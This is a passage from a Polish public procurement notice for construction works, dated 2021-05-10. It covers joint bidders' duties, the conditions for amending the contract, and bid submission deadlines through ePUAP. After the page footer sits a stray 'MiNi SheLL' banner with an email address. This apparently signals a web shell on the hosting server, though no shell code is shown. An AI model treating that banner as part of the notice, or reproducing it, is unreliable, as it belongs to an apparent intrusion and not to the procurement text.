postępowaniulub kryteriów selekcji. b.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączajądo oferty oświadczenie,z którego wynika, które roboty budowlane, dostawy lub usługi wykonająposzczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ.Oświadczenie to jest podmiotowym środkiem dowodowym. c. zobowiązani są oni na wezwanieZamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w podrozdziale 7SWZ,przy czym podmiotowe środki dowodowe, o których mowa w pkt. 7.3.1 SWZ składaodpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.9.3Jeżelizostała wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia,Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopiiumowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> publicznych,strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treścioferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpieniaktórejkolwiek z następujących okoliczności: 1) przedłużenie terminu realizacji zamówienia, októrym mowa w § 2ust. 1, może nastąpić w przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwedo zapobieżenia,które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, aktyterroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czymprzedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowiwystępowania okoliczności siły wyższej, 2) przedłużenie terminu realizacji zamówienia, o którymmowa w § 2 ust. 1, może nastąpić w przypadku skierowania przez Zamawiającego doWykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiotzamówienia lub wydania zakaz uprowadzenia robót budowlanych, stanowiących przedmiotzamówienia przez organ administracji publicznej lub eksploatorów infrastruktury, o ile żądanielub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność,przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającąokresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub zakazanoprowadzenie robót budowlanych 3)przedłużenie terminu realizacji zamówienia, o którym mowaw § 2 ust. 1, może nastąpić w przypadku wystąpienia kolizji z instalacjami wewnętrznyminieujawnionymi w dokumentacji projektowej, lub innymi robotami prowadzonymi przez innegowykonawcę, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dniniezbędną Wykonawcy na usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi wdokumentacji projektowej lub o liczbę dni niezbędnych do wykonania robót przez innegowykonawcę – o ile usunięcie kolizji wymagać będzie przedłużenia terminu realizacji; 4)przedłużenie terminu realizacji zamówienia,o którym mowa w § 2 ust. 1, może nastąpić wprzypadku wystąpienia konieczności wprowadzenia w dokumentacji projektowej zmian,powodujących wstrzymanie lub przerwanie robót budowlanych, stanowiących przedmiotzamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dniniezbędną do wprowadzenia zmian w dokumentacji projektowej oraz do przeprowadzeniauzgodnień (ustaleń) z właściwymi organami, uzyskania opinii właściwych organów oraz wydaniadecyzji przez właściwe organy, przy czym wprowadzenie w dokumentacji projektowej zmian niemoże skutkować zwiększeniem (zmianą)zakresu świadczenia Wykonawcy zawartego w ofercie,stanowiącej załącznik nr 3 do umowy oraz zwiększeniem wynagrodzenia Wykonawcy, o którymmowa w § 3 ust. 1, 5) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1,może nastąpić w przypadku wystąpienia warunków geologicznych lub hydrologicznychodmiennych od założonych w dokumentacji projektowej i powodujących koniecznośćwstrzymania robót lub konieczność ich wykonania przy wykorzystaniu odmiennych odzaprojektowanych rozwiązań technicznych, przy czym przedłużenie terminu realizacjizamówienia nastąpi o liczbę dni niezbędną do wyeliminowania utrudnień związanych z ichwystąpieniem, 6) przedłużenia terminu wykonania zamówienia w zakresie niezbędnym dowykonania robót zleconych na podstawie art. 455 ust. 1pkt 1, 3, 4 lub ust. 2 ustawy Prawozamówień publicznych, ciąg dalszy w Załączniku nr 9 Wzór Umowy w § 18. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza dozłożenia,zmiany,wycofania oferty lub wniosku lub wniosku dostępnego na miniPortalu UrzęduZamówień Publicznychoraz w systemie ePUAP. Elektroniczna Skrzynka Podawcza:/86frc5f0pl/SkrytkaESP znajdująca się naplatformie ePuap pod adresemhttps://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-10 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com